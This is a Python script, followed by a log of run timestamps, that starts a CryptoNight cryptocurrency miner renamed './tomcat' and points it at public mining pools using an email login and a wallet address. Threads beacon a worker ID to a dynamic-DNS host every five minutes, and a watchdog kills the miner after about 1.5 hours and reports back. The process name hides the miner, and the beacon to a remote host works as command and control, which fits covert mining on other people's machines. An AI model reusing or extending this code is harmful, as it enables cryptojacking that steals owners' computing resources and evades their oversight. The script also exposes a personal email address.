import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:34:07.164576
#2018-02-17 17:22:07.182912
#2018-02-17 19:11:05.936208
#2018-02-17 20:59:05.662529
#2018-02-17 22:45:06.418368
#2018-02-18 00:31:04.889404
#2018-02-18 02:21:04.402794
#2018-02-18 04:08:03.693414
#2018-02-18 05:59:05.510500
#2018-02-18 07:49:05.744079
#2018-02-18 09:36:07.040206
#2018-02-18 11:22:05.506836
#2018-02-18 13:08:07.504695
#2018-02-18 14:56:07.221879
#2018-02-18 16:44:07.457634
#2018-02-18 18:33:05.738148
#2018-02-18 20:20:09.295474
#2018-02-18 22:06:04.382642
#2018-02-18 23:54:06.509839
#2018-02-19 01:41:04.602064
#2018-02-19 03:29:07.457632
#2018-02-19 05:14:07.708078
#2018-02-19 07:01:01.371386
#2018-02-19 08:48:08.188720
#2018-02-19 10:38:06.877552
#2018-02-19 12:25:07.625855
#2018-02-19 14:12:10.436882
#2018-02-19 16:03:02.145876
#2018-02-19 17:51:08.807044
#2018-02-19 19:38:04.367705
#2018-02-19 21:26:01.745795
#2018-02-19 23:12:06.169197
#2018-02-20 00:57:05.782991
#2018-02-20 02:47:06.966691
#2018-02-20 04:35:09.058266
#2018-02-20 06:19:06.315424
#2018-02-20 08:04:01.511591
#2018-02-20 09:49:05.654917
#2018-02-20 11:33:01.728492
#2018-02-20 13:19:06.084296
#2018-02-20 15:05:05.615263
#2018-02-20 16:51:01.226879
#2018-02-20 18:39:03.953261
#2018-02-20 20:31:01.971674
#2018-02-20 22:15:06.870792
#2018-02-20 23:56:05.296913
#2018-02-21 01:43:02.076310
#2018-02-21 03:31:04.457253
#2018-02-21 05:19:03.963643
#2018-02-21 07:07:07.322693
#2018-02-21 08:53:06.536169
#2018-02-21 10:41:05.887847
#2018-02-21 12:28:09.137231
#2018-02-21 14:16:03.798260
#2018-02-21 16:03:08.566479
#2018-02-21 17:53:09.879241
#2018-02-21 19:39:07.819039
#2018-02-21 21:27:07.708739
#2018-02-21 23:15:06.079802
#2018-02-22 01:05:07.273242
#2018-02-22 02:52:05.310114
#2018-02-22 04:39:05.929575
#2018-02-22 06:24:05.631412
#2018-02-22 08:11:01.791452
#2018-02-22 09:59:07.627071
#2018-02-22 11:44:08.902049
#2018-02-22 13:31:07.327204
#2018-02-22 16:27:04.217457
#2018-02-22 19:28:08.871531
#2018-02-22 21:22:05.683508
#2018-02-22 23:09:04.208102
#2018-02-23 00:56:01.336646
#2018-02-23 02:43:05.501237
#2018-02-23 04:31:06.506306
#2018-02-23 06:17:05.726652
#2018-02-23 08:05:08.184595
#2018-02-23 10:21:01.708850
#2018-02-23 12:14:08.403116
#2018-02-23 14:03:09.468234
#2018-02-23 15:54:08.347567
#2018-02-23 17:39:06.031029
#2018-02-23 19:26:06.714532
#2018-02-23 21:10:02.720283
#2018-02-23 22:57:05.360086
#2018-02-24 00:45:09.701518
#2018-02-24 02:38:06.088309
#2018-02-24 04:32:07.857008
#2018-02-24 06:18:06.258744
#2018-02-24 08:06:07.678861
#2018-02-24 09:52:04.237596
#2018-02-24 11:46:07.425887
#2018-02-24 13:37:07.708867
#2018-02-24 15:25:08.198273
#2018-02-24 17:15:06.658517
#2018-02-24 19:07:07.360952
#2018-02-24 20:55:08.214779
#2018-02-25 01:16:03.850405
#2018-02-25 05:12:01.701178
#2018-02-25 10:57:01.915963